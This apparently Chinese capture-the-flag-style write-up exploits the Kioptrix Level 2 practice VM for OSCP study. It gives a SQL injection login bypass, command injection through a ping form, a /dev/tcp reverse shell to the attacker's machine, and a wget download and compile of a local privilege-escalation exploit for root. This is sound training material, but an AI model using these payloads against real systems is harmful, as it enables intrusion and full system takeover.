OSCP备战-kioptrix level _2详细分析

为什么审核一直不通过啊,这是靶机练习啊,为什么为什么为什么

探测目标IP

arp-scan -l


得出目标IP:192.168.155.164
也可以使用

netdiscover -i eth0 -r 192.168.155.0/24

端口扫描

nmap -sV -sT --min-rate 1000 -p1-65535 IP


结果如下:

└─$ nmap -sV -sT --min-rate 1000  -p1-65535 192.168.155.164
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 20:55 EDT
Nmap scan report for 192.168.155.164
Host is up (0.0034s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind  2 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
738/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)


80端口

访问一下,开局一个登录框


拿dirsearch 扫一下看看

dirsearch -u http://192.168.155.164 -e *


访问http://192.168.155.164/manual/index.html
apache页面,好像用处不大
回到登录框
端口开启有3306数据库
尝试SQL:
 

admin' or 1=1 #


进入后台,好像又空白了,但是网站嘛,查看源码一下


发现被注释掉的一部分源码
要恢复页面,bp抓返回包,去掉引号再放开,发现页面恢复正常了


网站执行Ping命令,很容易想到代码执行漏洞
试试看:

192.168.155.142;ls


回显显示出结果:index.php、pingit.php

kali开启监听:

nc -lvvp 9001


反弹shell:

192.168.155.142;sh -i >& /dev/tcp/192.168.155.142/9001 0>&1


查看kali,有结果了


查看id,显示:

uid=48(apache) gid=48(apache) groups=48(apache)


普通用户需要提权
查看系统版本:

uname -a


显示:

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux


查看详细的发行版系统版本信息:

cat /etc/*-release


查找版本漏洞:
 

searchsploit linux 2.6 centos 4.5


下载:

searchsploit -m 9542.c 


查看要求:

vim 9542.c 


因为要求将Poc下载到靶机里,我们通过反弹的shell实现
上kali机去开启一下服务:

python -m http.server 80


回到连接靶机,下载脚本:

cd /tmp
wget http://192.168.155.142/9542.c
ls


编译文件:

gcc 9542.c -o exploit
./exploit
whoami


权限是root了,大功告成

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值